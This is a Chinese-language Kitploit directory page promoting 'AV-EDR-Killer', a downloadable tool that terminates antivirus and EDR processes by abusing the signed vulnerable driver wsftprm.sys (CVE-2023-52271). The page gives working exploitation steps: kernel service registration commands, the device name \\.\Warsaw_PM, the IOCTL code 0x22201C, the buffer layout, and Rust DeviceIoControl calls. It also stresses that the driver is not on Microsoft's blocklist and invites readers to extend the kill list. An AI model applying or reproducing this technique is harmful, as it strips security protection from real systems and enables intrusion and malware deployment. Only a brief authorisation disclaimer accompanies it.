Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
AV-EDR-Killer — 通过利用易受攻击的驱动程序 (BYOVD) 终止 AV/EDR 进程 | Kitploit
工具/GitHubGitHub/xm0kht4r/av-edr-killer
权限提升持久化机制漏洞利用IDS/IPS规避横向移动后渗透利用命令与控制红队
GitHubxm0kht4r/av-edr-killer

AV-EDR-Killer

通过利用易受攻击的驱动程序 (BYOVD) 终止 AV/EDR 进程

查看仓库
2964647个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

AV/EDR Killer

https://github.com/user-attachments/assets/1eda3340-2af2-4136-b74e-be7a3f4b3924

本项目演示了如何将一个合法且已签名的驱动程序武器化,以获得内核级访问权限。

🚨 存在漏洞的驱动程序:

wsftprm.sys,由 TPZ SOLUCOES DIGITAIS LTDA 签名,此前已被公开披露存在本地权限提升漏洞(CVE-2023-52271),但不知为何仍未出现在微软的驱动黑名单中!!🤫🤫

该漏洞通过 IOCTL 码 0x22201C 触发,缓冲区大小为 1036 字节,其中前 4 字节包含目标进程 ID(DWORD 格式)。存在漏洞的驱动在通过 DeviceIoControl 接收此恶意 IOCTL 后,会调用导入的 ZwTerminateProcess 函数,从而允许任何用户态应用程序具备内核级的进程终止能力。

任何明智的威胁行为者自然会优先利用此能力来终止关键的防病毒(AV)和端点检测与响应(EDR)进程。

⚡ 利用方法:

1. 注册服务:

以管理员权限启动 cmd.exe,并注册一个类型为 "kernel"、binPath 指向漏洞驱动所在位置的内核驱动服务。

root@kitploit:~
> sc create MalDriver binPath= <path> type= Kernel`
> sc start MalDriver

加载后,该驱动会创建一个用户态可访问的符号链接 \\.\Warsaw_PM。我们可以通过 CreateFileW API 调用来获取驱动设备的句柄。

root@kitploit:~
> CreateFileW(device_name.as_ptr(), GENERIC_READ | GENERIC_WRITE, 0, ptr::null_mut(), OPEN_EXISTING, 0, ptr::null_mut())

要发送恶意 IOCTL,我们将使用 DeviceIoControl,码值为 0x22201C,缓冲区前 4 字节包含 PID。

root@kitploit:~
> DeviceIoControl(self.hDriver, 0x22201C, buffer.as_mut_ptr() as LPVOID, buffer.len() as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

2. 收获成果

Cargo build --release 生成二进制文件。

🛠️ 自定义:

你可以向目标列表添加更多要终止的进程。

🔒 免责声明

你需确保在使用此工具前已获得适当授权。作者对滥用行为不承担任何责任。

🤝 合作

欢迎贡献和建议!如果你有想法、改进意见或希望合作,请随时通过以下方式联系: [email protected]

下载工具